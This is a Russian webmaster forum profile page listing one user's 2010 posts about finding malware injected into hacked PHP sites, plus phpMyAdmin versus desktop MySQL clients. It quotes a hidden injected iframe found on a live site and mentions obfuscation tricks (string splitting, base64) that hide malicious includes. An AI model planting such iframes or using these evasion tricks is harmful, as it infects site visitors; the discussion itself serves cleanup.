admak

Рейтинг
130
Регистрация
19.07.2010
OzOrNoY-PoZiTiFF:
admak, всё прочитал, будем работать. :) Результаты будут у Вас в личных сообщениях. Максимальный срок - до завтрашнего вечера. Спасибо, что обратились. :)

Спасибо большое, результат - прямо в точку!

заранее спасибо, отправляю в личку

loot:

Может код выдает динамический адрес? там и .com может быть, и .ru.. а вот без http проинклудить не получится.

панацеи нет ни на что... :( echo "ht"+"tp"; или echo "h"+"t"+"t"+"p";

Ява скрипт тут причем тогда, когда надо найти зашифрованный или закодированный код. Без JS это сделать затруднительно.

мы рассматриваем конкретный случай, а не переливаем воду.

ява-скрипт выполняется на стороне клиента(т.е. браузера) и он не имеет ни какого отношения к вредоносному коду,

который я показал в первом своем посте.

этот html код отдает именно сервер(пхп,перл,цги и т.д.), а не клиентский ява скрипт.

admak добавил 16.10.2010 в 16:20

NumLocked:
при входе на сайт у меня нод высветил атаку трояна wiki\js.php - проблема в нем! фреймы вообще яндексом всегда считались признаком вредноносного ПО. и не только яндексом..

wiki\js.php - это уже следствие включенного ранее ифрейма.

когда-то наблюдал картину, что через первый ифрейм цеплялось еще последовательно штук 7 других вирусяк. наверное, они надеялись, что если первый вирус не сработает, то сработает второй, третий и т.д.

Angelo:
Искать по дате изменения файлов, если файл(скрипт) недавно правился.

изменить дату/время файла - всего лишь одна команда.

1. Искать подгружаемые файлы (include, require и т.д.)

ну это понятно. возможен еще вариант, когда все свои скрипты действительно абсолютно чистые, а вот хостинг - не совсем. это редкий случай, но встречался и с таким тоже

2. Искать в коде по "http"

лучше искать co.cc или iframe или куски доменов, что приведены выше.

хотя... простейший самописный кодировщик скроет все это, не говоря про тривиальный base64, uuencode и прочее..

3. Искать все java-скрипты

ява-скрипты тут не при чем, т.к. в данном случае контент отдается пхп скриптом.

Deman_nsk:
Умно. А в коде чисто. Типа - ударил и спрятался.

мы видим только, то что скрипт отдает браузеру, а вот сам пхп скрипт и условий по которым вредоносный код может появиться мы не видим. достаточно одного какого-то затрояненного плагина к цмс-ке, чтобы испортить жизнь сайта надолго.

а это что за бип-ня?...

на странице http://m350.ru/price/


<div class="navigation2"><iframe src=";onpage=cleaner&e=http" style="display:none"></iframe>

чистить немедленно. такого признака может быть достаточно для занесения в блек.

Upd: похоже вас довольно умно затроянили, при рефреше код пропадает.

если нужно, помогу найти и вычистить этот код с сайта.

авторские права...

а сама музыка - это самые обычные файлы, так что ничего особого нет.

RFC2505:
по поводу того, что десктопный клиент "тормозит" на больших табличках - подумайте сами, какой объём инфы передастся от сервера к вам для какой-то конкретной выборки с одинаковым кол-вом записей в случае использования сабжа и десктопа, если "тормозит" какой-то конкретный клиент, то это сугубо конкретный случай с этим клиентом

обычно, что бы сориентироваться или по-быстрому отобрать записи, делается

select * from table (добавлю еще одинаковый limit или where для чистоты эксперимента)

я довольно часто в базах использую поля типа text или mediumtext и в одной записи их может быть несколько и они заполнены.

десктопный клиент честно полностью вытягивает N записей и отображает их в листинге, в то время как phpMyAdmin через веб интерфейс отдает только несколько первых символов от каждого текстового поля (для беглого просмотра мне этого достаточно).

вот и получается разница в передаваемом объеме информации в несколько раз, отсюда и подтормаживание.

Hi-Celebs:
admak, спасибо огромное, и еще, мне интересно ваше мнение на счет

можно и так и сяк :)

phpMyAdmin - неприхотлив.

если сомневаетесь в своих силах, то потренируйтесь в другой папке. как все получится - можете переписывать поверх. хотя подводных камней по идее возникнуть в любом случае не должно.

Hi-Celebs:
Вот это понятно и ясно все. Спасибо. только вот под своим юзер/пасом имеется виду от базы данных?

да, совершенно верно.

admak добавил 15.10.2010 в 22:35

RFC2505:
Действительно, не вижу никакой необходимости в наличии phpMyAdmin на хосте, когда можно пользовать десктопного мускуль-клиента

десктопные клиенты - хороши, удобны, сам пользуюсь, но они жутко тормозят на больших табличках.

Всего: 1235